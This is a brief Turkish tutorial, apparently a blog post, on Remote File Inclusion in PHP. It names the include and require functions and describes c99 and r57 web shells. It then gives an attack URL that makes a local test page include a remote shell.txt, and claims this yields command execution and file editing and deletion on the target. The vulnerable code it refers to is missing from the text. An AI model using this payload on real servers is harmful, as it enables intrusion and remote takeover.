Remote File inclusion açıkları ile zaafiyet barındıran web uygulamalarına kendi kodlarımızı dahil edebiliriz. Doğal olarak hackerlar PHP ile geliştirilmiş olan c99 r57 ve benzeri gibi shell leri yazılıma dahil ederek sunucu üzerinde istedigin yapar kafasına göre istediği sayfa ile oynar editler.

 

include()

include_once()

requre()

requre_once()

Bu 4 adet fonksiyon yapısına argüman olarak verilen dosyayı bulundukları sayfanın içine dahil etmektedir.

Örnek ;

İlk satır html form’dan gelmekte olan verinin var olup olmadığını kontrol eden kısımdır.

isset adlı fonksiyona argüman olarak eklenen değişkenin herhangi bir veri ile dolu olup olmadığını kontrol etmektedir. Simdi hacker’ın bu kodu yorumlaması “Request ile gelen kısma bana ait olan kodların linkini yazarsam yazılıma kendi kodlarımı dahil edebilirim” şeklinde olacaktır. Peki bunu nasıl yaparız ;

  • c99 ve r57 isimli shell’ler bir php scripttir. Sunucu üzerinde komut çalıştırabilme, dizin gezme, dosya düzenleme ve silme gibi çok fazla özelliği mevcuttur.
  • c99,r57 yada benzeri iş yapan zararlı kodlar .txt formatında uzak bir web sitesine yerleştirilmiştir.

 

Bu link i url ye girersek başarılı oluruz çünkü ;

http://localhost:8080/bilal/test.php?gelen=https://biilal.com/shell.txt?

  • Soru işaretinden sonra ki kısım php derleyicisi tarafından dikkate alınmayacak ve bizim değişkenimizin sonuna eklenmeyecektir.

Bu url ile hedef sisteme zararlı yazılımı dahil ettik ve hedef sistemde komut çalıştırma dosya düzenleme silme gibi erişimleri elde ettik.